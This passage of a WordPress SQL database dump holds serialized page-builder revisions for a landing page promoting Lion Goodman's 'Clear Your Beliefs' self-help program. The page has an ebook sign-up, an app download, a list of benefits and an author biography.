/></a></p></center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(991, 1501, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:279:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<span style="margin-left: 41px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></span>\n[Form id="10"]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:805:"<p>[su_box title="Step 2" box_color="#1a2d8c" radius="8"]</p><p><span style="margin-left: 60px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></span></p><p style="text-align: center;"><strong>DOWNLOAD THE<br /> iClearIt APP</strong></p><p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p><p>[/su_box]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:613:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2731:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><center><br /><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p></center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(992, 1502, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:283:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n[Form id="10"]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:787:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 60px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong></p>\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:613:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2731:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><center><br /><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p></center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(993, 1503, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:324:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n[Form id="10"]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:825:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:613:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2731:"<div id="divStroke"><p><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>I am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em></p><p>All of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”</p><p>Join me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?</p><p>I look forward to hearing your feedback.  I’m always available for consultations and support of your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p><center><br /><p style="text-align: center;"><strong>Are you a Coach?  Therapist? Healer?  Change Agent?</strong></p><p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p><p><a href="#"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" /></a></p></center></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:5:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:8:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}}}'),
(994, 1504, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:139:"<center><iframe width="560" height="315" src="//www.youtube.com/embed/POVjeuef0RY?rel=0" frameborder="0" allowfullscreen></iframe></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:324:"[su_box title="Step 1" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n[Form id="10"]\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:825:"[su_box title="Step 2" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;">Start Clearing Whatever Is In The Way Right Now<a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:613:"<p>[su_box title="Step 3" box_color="#1a2d8c" radius="8"]</p><p style="text-align: center;"><strong>Learn about the </strong><strong><em>CLEAR YOUR BELIEFS</em></strong><strong> Program</strong></p><p style="text-align: center;"> Clear Limiting and Negative Beliefs Permanently. Eliminate Beliefs that Block Abundance, Love, Relationships, and Manifesting What You Want</p><p style="text-align: center;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal 